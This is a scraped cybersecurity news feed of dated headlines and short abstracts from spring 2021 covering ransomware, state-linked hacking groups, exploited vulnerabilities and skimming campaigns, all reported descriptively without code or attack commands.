Security researchers piecing together evidence from multiple attacks on cryptocurrency exchanges, attributed to a threat actor they named CryptoCore have established a strong connection to the North Korean state-sponsored group Lazarus.BleepingComputer
May 24, 2021
Researchers achieved persistent shell access on a Boeing 747 Full Text
Abstract
Researchers from Pen Test Partners established a persistent shell on an in-flight entertainment (IFE) system from a Boeing 747 airliner after exploiting a vulnerability dating back to 1999.The Register
May 20, 2021
What makes North Korean hacking groups more creative? Full Text
Abstract
From use of custom malware to pioneering strategies, North Korean hacking groups have shown an innovative spirit that helps them to punch above their weight.SCMagazine
May 20, 2021
Exchange Server Attackers Launched Scans Within Five Minutes of Disclosure Full Text
Abstract
Cheap cloud services support threat actor effortsInfosecurity Magazine
May 19, 2021
Hackers scan for vulnerable devices minutes after bug disclosure Full Text
Abstract
Every hour, a threat actor starts a new scan on the public web for vulnerable systems, moving at a quicker pace than global enterprises when trying to identify serious vulnerabilities on their networks.BleepingComputer
May 19, 2021
Colonial Pipeline Hackers Received $90 million in Bitcoin from Multiple Victims Before Shutting Down Full Text
Abstract
DarkSide, the group behind the recent Colonial Pipeline ransomware attack, received a total of $90 million in bitcoin ransom payments before shutting down last week, according to fresh research.NBC News
May 18, 2021
Try This One Weird Trick Russian Hackers Hate – Krebs on Security Full Text
Abstract
Digital extortion gangs like DarkSide take great care to make their entire platforms geopolitical, because their malware is engineered to work only in certain parts of the world.Krebs on Security
May 18, 2021
Researchers Discover Attackers Obfuscating IP Addresses Inside AWS Using Amazon VPC Service Full Text
Abstract
Security researchers have documented an attack technique that may allow attackers to leverage a legitimate Amazon VPC feature to mask their use of stolen API credentials inside AWS.Help Net Security
May 18, 2021
A Deep Dive Into DarkSide Operations Full Text
Abstract
The Colonial Pipeline, which carries fuel along a path of 5,500 miles all the way from Texas to New Jersey, was hacked by DarkSide ransomware operators. This ended up being the largest impact on the U.S. energy system from a cyberattack.Cyware Alerts - Hacker News
May 15, 2021
Group behind Colonial Pipeline hack to shut down operations: report Full Text
Abstract
The group behind the ransomware attack on Colonial Pipeline is reportedly shutting down its operations.The Hill
May 14, 2021
Pakistan-Linked Hackers Added New Windows Malware to Its Arsenal Full Text
Abstract
Cybercriminals with suspected ties to Pakistan continue to rely on social engineering as a crucial component of their operations as part of an evolving espionage campaign against Indian targets, according to new research. The attacks have been linked to a group called Transparent Tribe , also known as Operation C-Major, APT36, and Mythic Leopard, which has created fraudulent domains mimicking legitimate Indian military and defense organizations, and other malicious domains posing as file-sharing sites to host malicious artifacts. "While military and defense personnel continue to be the group's primary targets, Transparent Tribe is increasingly targeting diplomatic entities, defense contractors, research organizations and conference attendees, indicating that the group is expanding its targeting," researchers from Cisco Talos said on Thursday. These domains are used to deliver maldocs distributing CrimsonRAT , and ObliqueRAT, with the group incorporating new phishinThe Hacker News
May 14, 2021
Magecart gang hides PHP-based web shells in favicons Full Text
Abstract
The Magecart cybercrime gang is hiding malicious PHP web shells in website favicons, using them to maintain remote access and inject JavaScript skimmers into online stores.Security Affairs
May 14, 2021
Magecart Hackers Now hide PHP-Based Backdoor In Website Favicons Full Text
Abstract
Cybercrime groups are distributing malicious PHP web shells disguised as a favicon to maintain remote access to the compromised servers and inject JavaScript skimmers into online shopping platforms with an aim to steal financial information from their users. "These web shells known as Smilodon or Megalodon are used to dynamically load JavaScript skimming code via server-side requests into online stores," Malwarebytes Jérôme Segura said in a Thursday write-up. "This technique is interesting as most client-side security tools will not be able to detect or block the skimmer." Injecting web skimmers on e-commerce websites to steal credit card details is a tried-and-tested modus operandi of Magecart, a consortium of different hacker groups who target online shopping cart systems. Also known as formjacking attacks, the skimmers take the form of JavaScript code that the operators stealthily insert into an e-commerce website, often on payment pages, with an intent to cThe Hacker News
May 14, 2021
Darkside Hacking Group Linked to Colonial Pipeline Attack Says it is Closing Down Full Text
Abstract
DarkSide has told associates it has lost access to the infrastructure it uses to run its operation and would be shutting down, citing pressure from law enforcement and from the U.S., FireEye said.The Wall Street Journal
May 13, 2021
Colonial Pipeline Attackers Linked to Infamous REvil Group Full Text
Abstract
East coast fuel pipeline slowly resumes operationsInfosecurity Magazine
May 13, 2021
Beyond Lazarus: North Korean cyber-threat groups become top-tier, ‘reckless’ adversaries Full Text
Abstract
Over recent years, North Korea has evolved from a nuisance to its neighbor South Korea and purveyor of ransomware and DDoS attacks to become the scourge of banks and cryptocurrency exchanges.The Daily Swig
May 12, 2021
Gig Workers Paid $500 for Payroll Passwords Full Text
Abstract
Argyle is paying workers to help hack payroll providers, researchers suspect.Threatpost
May 11, 2021
Researcher hacked Apple AirTag two weeks after its launch Full Text
Abstract
Apple AirTag was launched less than two weeks ago, but a security researcher already claims to have hacked it. The Apple AirTag has been available for just a couple of weeks and the hacking community is already working on it to demonstrate...Security Affairs
May 11, 2021
Sophisticated Cyber Group Designs Evasive Toolsets Full Text
Abstract
Researchers from Kaspersky uncover an ongoing espionage campaign called TunnelSnake targeting Asian and African diplomats and some high-profile organizations. The attack is being allegedly conducted by Chinese actors.Cyware Alerts - Hacker News
May 11, 2021
Roaming Mantis Evolving and Improvising its Smishing Campaign Full Text
Abstract
The Roaming Mantis threat actor group has improved its attack tactic to steal more funds while evading detection. The group is now using whitelisting to spread two new malware families. Researchers suspect that this could be the work of more than one group of attackers working together.Cyware Alerts - Hacker News
May 10, 2021
Threat actors added thousands of Tor exit nodes to carry out SSL stripping attacks Full Text
Abstract
Starting from January 2020, a threat actor has been adding thousands of malicious exit relays to the Tor network to intercept traffic to cryptocurrency-related sites.Security Affairs
May 07, 2021
US, UK authorities say Russian state-sponsored hackers exploited Microsoft vulnerabilities Full Text
Abstract
Russian state-sponsored hackers were among those to exploit recently uncovered vulnerabilities in Microsoft’s Exchange Server email application, which potentially compromised thousands of organizations, a coalition of American and British federal agencies warned Friday.The Hill
May 7, 2021
Hacking the Hackers, OGUsers Hacked Again Full Text
Abstract
OGUsers has been hacked for the fourth time in two years. The hacking forum’s database consisting of private messages and user records for almost 350,000 members is on sale now for $3,000.Cyware Alerts - Hacker News
May 07, 2021
Russian state hackers switch targets after US joint advisories Full Text
Abstract
Russian Foreign Intelligence Service (SVR) operators have switched their attacks to target new vulnerabilities in reaction to US govt advisories published last month with info on SVR tactics, tools, techniques, and capabilities used in ongoing attacks.BleepingComputer
May 6, 2021
REvil REvil - The Cyber Devil Full Text
Abstract
REvil is a fierce threat with its smart hacking tactics and techniques. The ransomware now spreads via exploit kits, RDP servers, backdoored software installers, and scan-and-exploit methods. Apply adequate security measures to stay protected.Cyware Alerts - Hacker News
May 5, 2021
Homecoming Queen Hacker to be Tried as an Adult Full Text
Abstract
Florida teen accused of hacking students’ accounts to rig homecoming contest to face felony charges as an adultInfosecurity Magazine
May 2, 2021
Hacking a Tesla Model X with a DJI Mavic 2 drone equipped with a WIFI dongle Full Text
Abstract
A security duo has demonstrated how to hack a Tesla Model X and open its doors using a DJI Mavic 2 drone equipped with a WiFi dongle. The scenario is disconcerting: hackers could fly a drone over your Tesla Model X and open the doors, a couple...Security Affairs
May 1, 2021
Lazarus Group Looks to Cryptocurrency Theft to Diversify its Attack Tactics Full Text
Abstract
While the North Korean threat actor had targeted e-commerce shops in 2019 and 2020 to steal payment card information, the attackers aimed to steal cryptocurrency, as well.Cyware Alerts - Hacker News
May 1, 2021
SolarMarker RAT Uses Google SEO Tactics to Lure Victims Full Text
Abstract
Attackers are using Google search redirection and drive-by-download tactics to infect targeted users with SolarMarker RAT.Cyware Alerts - Hacker News
April 30, 2021
Suspected Chinese state hackers target Russian submarine designer Full Text
Abstract
Hackers suspected to work for the Chinese government have used a new malware called PortDoor to infiltrate the systems of an engineering company that designs submarines for the Russian Navy.BleepingComputer
April 29, 2021
Russian Hackers Actively Targeting the U.S. and Other Organizations Full Text
Abstract
In a joint alert, the FBI, DHS, and CISA warned of coordinated attacks by the Russian Foreign Intelligence Service (SVR), aka APT29, against U.S. and foreign organizations.Cyware Alerts - Hacker News
April 29, 2021
LuckyMouse Hackers Target Banks, Companies and Governments in 2020 Full Text
Abstract
An adversary known for its watering hole attacks against government entities has been linked to a slew of newly detected intrusions targeting various organizations in Central Asia and the Middle East. The malicious activity, collectively named "EmissarySoldier," has been attributed to a threat actor called LuckyMouse, and is said to have happened in 2020 with the goal of obtaining geopolitical insights in the region. The attacks involved deploying a toolkit dubbed SysUpdate (aka Soldier) in a number of breached organizations, including government and diplomatic agencies, telecom providers, a TV media company, and a commercial bank. LuckyMouse , also referred to as APT27 and Emissary Panda, is a sophisticated cyberespionage group that has a history of breaching multiple government networks in Central Asia and the Middle East. The actor has also been linked to cyberattacks aimed at transnational organizations such as the International Civil Aviation Organization ( ICAO )The Hacker News
April 27, 2021
Hackers Threaten to Leak D.C. Police Informants’ Info If Ransom Is Not Paid Full Text
Abstract
The Metropolitan Police Department (MPD) of the District of Columbia has become the latest high-profile government agency to fall victim to a ransomware attack. The Babuk Locker gang claimed in a post on the dark web that they had compromised the DC Police's networks and stolen 250 GB of unencrypted files. Screenshots shared by the group, and seen by The Hacker News, include various folders containing what appears to be investigation reports, arrests, disciplinary actions, and other intelligence briefings. Also called the DC Police, the MPD is the primary law enforcement agency for the District of Columbia in the U.S. The ransomware gang has given the department three days to heed their ransom demand or risk leaking sensitive files that could expose police informants to criminal gangs. "Hello! Even an institution such as DC can be threatened, we have downloaded a sufficient amount of information from your internal networks, and we advise you to contact us as soon as pThe Hacker News
April 27, 2021
Another SolarWinds lesson: Hackers are targeting Microsoft authentication servers Full Text
Abstract
Mandiant Tuesday detailed a new attack strategy against Microsoft’s Active Directory Federation Services (AD FS). Researchers believe the need to protect AD FS might be the unheralded second lesson from the SolarWinds campaign.SCMagazine
April 27, 2021
Hackers Exploit 0-Day Gatekeeper Flaw to Attack MacOS Computers Full Text
Abstract
Security is only as strong as the weakest link. As further proof of this, Apple released an update to macOS operating systems to address an actively exploited zero-day vulnerability that could circumvent all security protections, thus permitting unapproved software to run on Macs. The macOS flaw, identified as CVE-2021-30657, was discovered and reported to Apple by security engineer Cedric Owens on March 25, 2021. "An unsigned, unnotarized, script-based proof of concept application [...] could trivially and reliably sidestep all of macOS's relevant security mechanisms (File Quarantine, Gatekeeper, and Notarization Requirements), even on a fully patched M1 macOS system," security researcher Patrick Wardle explained in a write-up. "Armed with such a capability macOS malware authors could (and are) returning to their proven methods of targeting and infecting macOS users." Apple's macOS comes with a feature called Gatekeeper, which allows only trusteThe Hacker News
April 27, 2021
REvil Removes Apple Extortion Attempt from Site: Report Full Text
Abstract
Mystery as ransomware group deletes all mention of schemeInfosecurity Magazine
April 27, 2021
Ransomware Group Threatens DC Cops with Informant Data Leak Full Text
Abstract
Babuk is reportedly ready to share info with local gangsInfosecurity Magazine
April 25, 2021
Hackers are targeting Soliton FileZen file-sharing servers Full Text
Abstract
Threat actors are exploiting two flaws in the popular file-sharing server FileZen to steal sensitive data from businesses and government organizations. Threat actors are exploiting two vulnerabilities in the popular file-sharing server FileZen, tracked...Security Affairs
April 23, 2021
Oscar-Bait, Literally: Hackers Abuse Nominated Films for Phishing, Malware Full Text
Abstract
Judas and the Black Messiah may be a favorite for Best Picture at the 93rd Academy Awards on Sunday, but it’s a fave for cybercriminals too.Threatpost
April 22, 2021
Researchers Find Additional Infrastructure Used By SolarWinds Hackers Full Text
Abstract
The sprawling SolarWinds cyberattack which came to light last December was known for its sophistication in the breadth of tactics used to infiltrate and persist in the target infrastructure, so much so that Microsoft went on to call the threat actor behind the campaign "skillful and methodic operators who follow operations security (OpSec) best practices to minimize traces, stay under the radar, and avoid detection." But new research published today shows that the threat actor carefully planned each stage of the operation to "avoid creating the type of patterns that make tracking them simple," thus deliberately making forensic analysis difficult. By analyzing telemetry data associated with previously published indicators of compromise, RiskIQ said it identified an additional set of 18 servers with high confidence that likely communicated with the targeted, secondary Cobalt Strike payloads delivered via the TEARDROP and RAINDROP malware, representing a 56% jumThe Hacker News
April 21, 2021
REvil seeks to extort Apple and hits supplier with $50 million ransom Full Text
Abstract
REvil – which has been on a tear the past several weeks – wants Apple to pay an undisclosed ransom by May 1 to “buy back” 15 stolen schematics of unreleased MacBooks and gigabytes of personal data on several major Apple brands they obtained from Quanta.SCMagazine
April 21, 2021
Someone is using SonicWall’s email security tool to hack customers Full Text
Abstract
It’s the second time SonicWall has been hit with an attack leveraging previously unknown weaknesses in their security products this year.SCMagazine
April 21, 2021
Logins for 1.3 million Windows RDP servers collected from hacker market Full Text
Abstract
The login names and passwords for 1.3 million current and historically compromised Windows Remote Desktop servers have been leaked by UAS, the largest hacker marketplace for stolen RDP credentials.BleepingComputer
April 20, 2021
WARNING: Hackers Exploit Unpatched Pulse Secure 0-Day to Breach Organizations Full Text
Abstract
If the Pulse Connect Secure gateway is part of your organization network, you need to be aware of a newly discovered critical zero-day authentication bypass vulnerability (CVE-2021-22893) that is currently being exploited in the wild and for which there is no patch yet. At least two threat actors have been behind a series of intrusions targeting defense, government, and financial organizations in the U.S. and elsewhere by leveraging critical vulnerabilities in Pulse Secure VPN devices to circumvent multi-factor authentication protections and breach enterprise networks. "A combination of prior vulnerabilities and a previously unknown vulnerability discovered in April 2021, CVE-2021-22893, are responsible for the initial infection vector," cybersecurity firm FireEye said on Tuesday, identifying 12 malware families associated with the exploitation of Pulse Secure VPN appliances. The company is also tracking the activity under two threat clusters UNC2630 and UNC2717 ("The Hacker News
April 20, 2021
REvil gang tries to extort Apple, threatens to sell stolen blueprints Full Text
Abstract
The REvil ransomware gang asked Apple to "buy back" stolen product blueprints to avoid having them leaked on REvil's leak site before today's Apple Spring Loaded event where the new iMac was introduced.BleepingComputer
April 20, 2021
Hacking an X-RAY Machine with WHIDelite & EvilCrowRF Full Text
Abstract
The popular cyber security expert Luca Bongiorni demonstrated how to hack an X-Ray Machine using his WHIDelite tool. Recently I bought an X-RAY machine from China to have some ghetto-style desktop setup in order to inspect/reverse engineer some PCBs...Security Affairs
April 20, 2021
Hackers exploit unpatched vulnerabilities, zero day to attack governments and contractors Full Text
Abstract
FireEye’s Mandiant team revealed ongoing exploitation of vulnerabilities in Pulse Secure VPN devices by at least two hacking groups, one of which they linked to China, to attack governments, defense contractors and other businesses in the U.S. and Europe.SCMagazine
April 20, 2021
Threat Actor Claims to Have Hacked Domino’s Full Text
Abstract
Hacker claims to have stolen 13TBs of data from multinational pizza chain’s Indian wingInfosecurity Magazine
April 20, 2021
Foreign threat actors used fake LinkedIn profiles to lure 10,000 UK nationals Full Text
Abstract
The targeting shows that humans remain the weak link in any cyber and data security strategy.SCMagazine
April 20, 2021
Watch out, hackers can take over your Cosori Smart Air Fryer Full Text
Abstract
Watch out, hackers could break into your house by exploiting two remote code execution (RCE) vulnerabilities in the Cosori Smart Air Fryer. Security experts from Cisco Talos have found two remote code execution (RCE) vulnerabilities in the Cosori...Security Affairs
April 20, 2021
Codecov hackers breached hundreds of restricted customer sites: sources Full Text
Abstract
The attackers used automation to rapidly copy customer credentials and raid additional resources, the investigators said, expanding the breach beyond the initial disclosure by Codecov on Thursday.Reuters
April 20, 2021
North Korean hackers adapt web skimming for stealing Bitcoin Full Text
Abstract
Hackers linked with the North Korean government applied the web skimming technique to steal cryptocurrency in a previously undocumented campaign that started early last year, researchers say.BleepingComputer
April 19, 2021
Experts demonstrated how to hack a utility and take over a smart meter Full Text
Abstract
Researchers from FireEye's Mandiant team have breached the network of a North American utility and turned off one of its smart meters. Over the years, the number of attacks against ICS/SCADA systems used by industrial organizations worldwide has rapidly...Security Affairs
April 19, 2021
Chinese threat actors extract big data and sell it on the dark web Full Text
Abstract
The stolen data ranges from lottery and stock data to commercial databases of Canadian and U.S. businesses.SCMagazine
April 16, 2021
Lazarus E-Commerce Attackers Also Targeted Cryptocurrency Full Text
Abstract
Hackers with apparent ties to North Korea that hit e-commerce shops in 2019 and 2020 to steal payment card data also tested functionality for stealing cryptocurrency, according to Group-IB.Careers Info Security
April 16, 2021
Trickbot Actors Target Slack and BaseCamp Users Full Text
Abstract
Customized scam messages designed to deploy malware loaderInfosecurity Magazine
April 15, 2021
Lazarus E-Commerce Attackers Also Targeted Cryptocurrency Full Text
Abstract
Hackers with apparent ties to North Korea that hit e-commerce shops in 2019 and 2020 to steal payment card data also tested functionality for stealing cryptocurrency, according to the cybersecurity firm Group-IB.Gov Info Security
April 15, 2021
Attackers Target ProxyLogon Exploit to Install Cryptojacker Full Text
Abstract
Threat actors targeted compromised Exchange servers to host malicious Monero cryptominer in an “unusual attack,” Sophos researchers discovered.Threatpost
April 15, 2021
Global Attacker Dwell Time Drops to Just 24 Days Full Text
Abstract
Ransomware spike and better threat detection play a partInfosecurity Magazine
April 14, 2021
FireEye: 650 new threat groups were tracked in 2020 Full Text
Abstract
FireEye published its M-Trend 2021 report, based on the data collected during its investigations: 650 new threat groups were tracked in 2020. FireEye published its annual report, titled M-Trend 2021, which is based on the data collected during the investigation...Security Affairs
April 09, 2021
Hackers Tampered With APKPure Store to Distribute Malware Apps Full Text
Abstract
APKPure, one of the largest alternative app stores outside of the Google Play Store, was infected with malware this week, allowing threat actors to distribute Trojans to Android devices. In an incident that's similar to that of German telecommunications equipment manufacturer Gigaset, the APKPure client version 3.17.18 is said to have been tampered with in an attempt to trick unsuspecting users into downloading and installing malicious applications linked to the malicious code built into the APKpure app. The development was reported by researchers from Doctor Web and Kaspersky. "This trojan belongs to the dangerous Android.Triada malware family capable of downloading, installing and uninstalling software without users' permission," Doctor Web researchers said. According to Kaspersky, the APKPure version 3.17.18 was tweaked to incorporate an advertisement SDK that acts as a Trojan dropper designed to deliver other malware to a victim's device. "ThiThe Hacker News
April 9, 2021
Cloud-native watering hole attack: Simple and potentially devastating Full Text
Abstract
The perpetrators are as diverse as their targets – fraudsters looking to steal identities, cybercriminal gangs in pursuit of quick profits, state-backed attackers seeking access to larger networks.Help Net Security
April 8, 2021
Hackers Are Exploiting Discord and Slack Links to Serve Up Malware Full Text
Abstract
New research by Talos highlights how, over the course of the Covid-19 pandemic, collaboration tools like Slack and, much more commonly, Discord have become handy mechanisms for cybercriminals.Wired
April 8, 2021
Hackers Selling 330,000 Stolen Payment Cards and 895,000 Gift Cards from Online Shops Full Text
Abstract
What do the likes of AirBnB, Amazon, American Airlines, Chipotle, Dunkin Donuts, Nike, Marriott, Target, Subway and Walmart, have in common? Well,...Cyber Security News
April 7, 2021
Threat actors targeted Slack and Discord as the pandemic raged on Full Text
Abstract
Collaboration tools that have become more central to how organizations operate since the pandemic are poorly understood by infosec teams and are relatively immature in terms of accompanying security protections provided by third parties.SCMagazine
April 07, 2021
VISA: Hackers increasingly using web shells to steal credit cards Full Text
Abstract
Global payments processor VISA warns that threat actors are increasingly deploying web shells on compromised servers to exfiltrate credit card information stolen from online store customers.BleepingComputer
April 6, 2021
Chinese Hackers Selling Intimate Stolen Camera Footage Full Text
Abstract
A massive operation offers access to hacked camera feeds in bedrooms and at hotels.Threatpost
April 06, 2021
Hacker sells $38M worth of gift cards from thousands of shops Full Text
Abstract
A Russian hacker has sold on a top-tier underground forum close to 900,000 gift cards with a total value estimated at $38 million.BleepingComputer
April 6, 2021
Hackers actively targeting unsecured SAP installs, DHS, SAP and Onapsis warn Full Text
Abstract
With a base of 400,000 clients, SAP chief information security officer said this of the alert: “We want them to be aware of what could be the art of the possible.”SCMagazine
April 06, 2021
Hackers From China Target Vietnamese Military and Government Full Text
Abstract
A hacking group related to a Chinese-speaking threat actor has been linked to an advanced cyberespionage campaign targeting government and military organizations in Vietnam. The attacks have been attributed with low confidence to the advanced persistent threat (APT) called Cycldek (or Goblin Panda, Hellsing, APT 27, and Conimes), which is known for using spear-phishing techniques to compromise diplomatic targets in Southeast Asia, India, and the U.S. at least since 2013. According to researchers from Kaspersky, the offensive, which was observed between June 2020 and January 2021, leverages a method called DLL side-loading to execute shellcode that decrypts a final payload dubbed "FoundCore." DLL side-loading has been a tried-and-tested technique used by various threat actors as an obfuscation tactic to bypass antivirus defenses. By loading malicious DLLs into legitimate executables, the idea is to mask their malicious activity under a trusted system or software procThe Hacker News
April 5, 2021
Spy Operations Target Vietnam with Sophisticated RAT Full Text
Abstract
Researchers said the FoundCore malware represents a big step forward when it comes to evasion.Threatpost
April 5, 2021
Once Again, North Korean Hackers Target Security Researchers Full Text
Abstract
According to Google's Threat Analysis Group (TAG), the attackers created a website for a fake company offering offensive security services to attract security researchers.Cyware Alerts - Hacker News
April 5, 2021
Threat Actors Behind Hancitor Malware Use Network Ping Tool to Enumerate Active Directory (AD) Environment Full Text
Abstract
Hancitor is an information stealer and malware downloader used by a threat actor designated as MAN1, Moskalvzapoe, or TA511.Cyber Security News
April 5, 2021
The leap of a Cycldek-related threat actor Full Text
Abstract
In the nebula of Chinese-speaking threat actors, it is quite common to see tools and methodologies being shared. One such example of this is the infamous DLL side-loading triad.Kaspersky Labs
April 3, 2021
Hunting the hunters: How Russian hackers targeted US cyber first responders in SolarWinds breach Full Text
Abstract
After infiltrating US government computer networks early last year as part of the SolarWinds data breach, Russian hackers then turned their attention to the very people whose job was to track them down.CNN Money
April 02, 2021
FBI and CISA warn of state hackers attacking Fortinet FortiOS servers Full Text
Abstract
The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) warn of advanced persistent threat (APT) actors targeting Fortinet FortiOS servers using multiple exploits.BleepingComputer
April 2, 2021
Recent Hancitor Infections Use Cobalt Strike and a Network Ping Tool Full Text
Abstract
As early as October 2020, Hancitor began utilizing Cobalt Strike and some of these infections utilized a network ping tool to enumerate the infected host’s internal network.Palo Alto Networks
April 2, 2021
Bahamut Possibly Responsible for Multi-Stage Infection Chain Campaign Full Text
Abstract
Threat researchers discovered cyberthreat actors distributing malicious documents exploiting a vulnerability (CVE-2017-8570) during a multi-stage infection chain to install a Visual Basic (VB) executable on target machines.Anomali
April 1, 2021
North Korean Hackers Expand Targeting of Security Community Full Text
Abstract
New fake company and social profiles seek to lure researchersInfosecurity Magazine
April 1, 2021
Back in a Bit: Attacker Use of the Windows Background Intelligent Transfer Service Full Text
Abstract
When malicious applications create BITS jobs, files are downloaded or uploaded in the context of the service host process. This can be used to bypass firewalls that block unknown processes.FireEye
March 31, 2021
Hackers Set Up a Fake Cybersecurity Firm to Target Security Experts Full Text
Abstract
A North Korean government-backed campaign targeting cybersecurity researchers with malware has re-emerged with new tactics in their arsenal as part of a fresh social engineering attack. In an update shared on Wednesday, Google's Threat Analysis Group said the attackers behind the operation set up a fake security company called SecuriElite and a slew of social media accounts across Twitter and LinkedIn in an attempt to trick unsuspecting researchers into visiting the company's booby-trapped website "where a browser exploit was waiting to be triggered." "The new website claims the company is an offensive security company located in Turkey that offers pentests, software security assessments and exploits," TAG's Adam Weidemann said. The website is said to have gone live on March 17. A total of eight Twitter profiles and seven LinkedIn profiles, who claimed to be vulnerability researchers and human resources personnel at different security firms (incluThe Hacker News
March 31, 2021
North Korea-linked hackers target security experts again Full Text
Abstract
Researchers from Google's Threat Analysis Group (TAG) reported that North Korea-linked hackers are targeting security researchers via social media. The cyberspies used fake Twitter and LinkedIn social media accounts to get in contact with the victims....Security Affairs
March 31, 2021
Google: North Korean hackers target security researchers again Full Text
Abstract
Google's Threat Analysis Group (TAG) says that North Korean government-sponsored hackers are once again targeting security researchers using fake Twitter and LinkedIn social media accounts.BleepingComputer
March 31, 2021
Iranian credential thieves targeting medical researchers Full Text
Abstract
In late 2020, a well-known hacker group believed to be sponsored by the Iranian government started a credential harvesting campaign targeting United States and Israeli medical personnel, according to new research from Proofpoint.SCMagazine
March 31, 2021
Adversaries are using backdoored video game cheat engines and modding tools Full Text
Abstract
Talos detected a new cryptor used in several different malware campaigns hidden in files that users would usually download to install cheat codes into video games or other visual and game mods.Cisco Talos
March 31, 2021
Iranian hackers targeting US, Israeli medical researchers: analysis Full Text
Abstract
A hacking group associated with the Iranian government targeted senior medical researchers in the U.S. and Israel over the past few months, new research released Wednesday found.The Hill
March 31, 2021
Hackers are implanting multiple backdoors at industrial targets in Japan Full Text
Abstract
Cybersecurity researchers on Tuesday disclosed details of a sophisticated campaign that deploys malicious backdoors for the purpose of exfiltrating information from a number of industry sectors located in Japan. Dubbed "A41APT" by Kaspersky researchers, the findings delve into a new slew of attacks undertaken by APT10 (aka Stone Panda or Cicada) using previously undocumented malware to deliver as many as three payloads such as SodaMaster, P8RAT, and FYAnti. The long-running intelligence-gathering operation first came onto the scene in March 2019, with activities spotted as recently as November 2020, when reports emerged of Japan-linked companies being targeted by the threat actor in over 17 regions worldwide. The fresh attacks uncovered by Kaspersky are said to have occurred in January 2021. The infection chain leverages a multi-stage attack process, with the initial intrusion happening via abuse of SSL-VPN by exploiting unpatched vulnerabilities or stolen credentialThe Hacker News
March 30, 2021
SolarWinds Attackers Accessed DHS Emails, Report Full Text
Abstract
Current and former administration sources say the nation-state attackers were able to read the Homeland Security Secretary’s emails, among others.Threatpost
March 30, 2021
SolarWinds Attackers Accessed DHS Secretary’s Emails — Report Full Text
Abstract
Trump administration’s security boss and staff compromisedInfosecurity Magazine
March 29, 2021
RedEcho group parks domains after public exposure Full Text
Abstract
RedEcho, which was linked to a campaign that targeted India’s power grid, has taken down its attack infrastructure after having its operations exposed at the end of February 2021.The Record
March 26, 2021
Suspected Chinese Group Exploiting Microsoft Exchange Servers Full Text
Abstract
Beginning on March 1, 2021, Recorded Future’s Insikt Group identified a large increase in victim communications to PlugX command and control (C2) infrastructure publicly attributed to the suspected Chinese state-sponsored group Calypso APT.Recorded Future
March 25, 2021
Chinese Hackers Used Facebook to Hack Uighur Muslims Living Abroad Full Text
Abstract
Facebook may be banned in China, but the company on Wednesday said it has disrupted a network of bad actors using its platform to target the Uyghur community and lure them into downloading malicious software that would allow surveillance of their devices. "They targeted activists, journalists and dissidents predominantly among Uyghurs from Xinjiang in China primarily living abroad in Turkey, Kazakhstan, the United States, Syria, Australia, Canada and other countries," Facebook's Head of Cyber Espionage Investigations, Mike Dvilyanski, and Head of Security Policy, Nathaniel Gleicher, said. "This group used various cyber espionage tactics to identify its targets and infect their devices with malware to enable surveillance." The social media giant said the "well-resourced and persistent operation" aligned with a threat actor known as Evil Eye (or Earth Empusa), a China-based collective known for its history of espionage attacks against the Muslim mThe Hacker News
March 25, 2021
Chinese Hackers Used Facebook to Hack Uyghurs Living Abroad Full Text
Abstract
Facebook’s head of cyberespionage said it had found and removed fewer than 500 accounts that sent malicious links to Uyghurs as part of “an extremely targeted operation.”NBC News
March 24, 2021
Facebook takes action against Chinese hackers targeting Uyghurs Full Text
Abstract
Facebook on Wednesday announced that it had taken steps to disrupt efforts of Chinese hacking groups to target and surveil members of the Uyghur community both in China and abroad.The Hill
March 24, 2021
Facebook blocks Chinese state hackers targeting Uyghur activists Full Text
Abstract
Facebook took down accounts used by a Chinese-sponsored hacking group to deploy surveillance malware on devices used by Uyghur activists, journalists, and dissidents living outside China.BleepingComputer
March 21, 2021
Swiss Firm Says It Has Accessed Servers of a SolarWinds Hacker Full Text
Abstract
A Swiss cybersecurity firm says it has accessed servers used by a hacking group tied to the SolarWinds breach, revealing details about who the attackers targeted and how they carried out their operation.Bloomberg Quint
March 20, 2021
Hacking group used 11 zero-days to attack Windows, iOS, Android users Full Text
Abstract
Project Zero, Google's zero-day bug-hunting team, discovered a group of hackers that used 11 zero-days in attacks targeting Windows, iOS, and Android users within a single year.BleepingComputer
March 20, 2021
Magecart Hackers Hide the Credit Card Data in Image Files Full Text
Abstract
Nowadays cybercriminals are mainly focusing on credit card theft, as they always try their best to find different methods to successfully...Cyber Security News
March 19, 2021
Threat actors are attempting to exploit CVE-2021-22986 in F5 BIG-IP devices in the wild Full Text
Abstract
Cybersecurity experts warn of ongoing attacks aimed at exploiting a recently patched critical vulnerability in F5 BIG-IP and BIG-IQ networking devices. Cybersecurity experts from NCC Group and Bad Packets security firm this week detected a wave...Security Affairs
March 19, 2021
REvil is on Another Attack Spree Full Text
Abstract
Victimizing at least nine organizations across Africa, Europe, Mexico, and the U.S in the past two weeks, the REvil gang is probably showing off its Gootloader malware loader.Cyware Alerts - Hacker News
March 18, 2021
Chinese nation state hackers linked to Finnish Parliament hack Full Text
Abstract
Chinese nation-state hackers have been linked to an attack on the Parliament of Finland that took place last year and led to the compromise of some parliament email accounts.BleepingComputer
March 18, 2021
Hackers can get access to your SMSes for just a few dollars Full Text
Abstract
Text-messaging management services are now being misused for as little as $16 to covertly redirect text messages from users to hackers, giving cybercriminals access to two-factor codes/login SMSes.The Times Of India
March 17, 2021
China-linked hackers target telcos to steal 5G secrets Full Text
Abstract
Chinese APT groups are targeting telecom companies in cyberespionage campaigns collectively tracked as Operation Diànxùn, to steal 5G secrets. Chinese-language threat actors are targeting telecom companies, as part of a cyber espionage campaign...Security Affairs
March 17, 2021
State-sponsored Threat Groups Target Telcos, Steal 5G Secrets Full Text
Abstract
Researchers say China-linked APTs lure victims with bogus Huawei career pages in what they dub ‘Operation Diànxùn’.Threatpost
March 17, 2021
[Webinar] Oy Vey, We Hired a Large, Hairy Hacker… Full Text
Abstract
It's not every day that one of the best-known independent cybersecurity individuals joins a cybersecurity company. The two are generally on opposite sides of the coin, with little crossover. After all, they're usually concerned with different parts of the cybersecurity puzzle – one providing platforms and tools to defend organizations, the other keeping them accountable and looking for blind spots in even the best security tools. That seems to be changing, however, with a recent appointment. Cynet, an Autonomous XDR provider that recently closed a Series C funding round worth $40 million, announced that it has hired Chris Roberts as their Chief Security Strategist. Roberts is world-renowned in counter-threat intelligence, as well as in vulnerability and threat research fields, thanks to decades of experience. As part of his efforts at Cynet, Roberts will be focusing his work on helping empower and connect security professionals from organizations outside of the Fortune 200The Hacker News
March 17, 2021
Threat actors thriving on the fear and uncertainty of remote workforces Full Text
Abstract
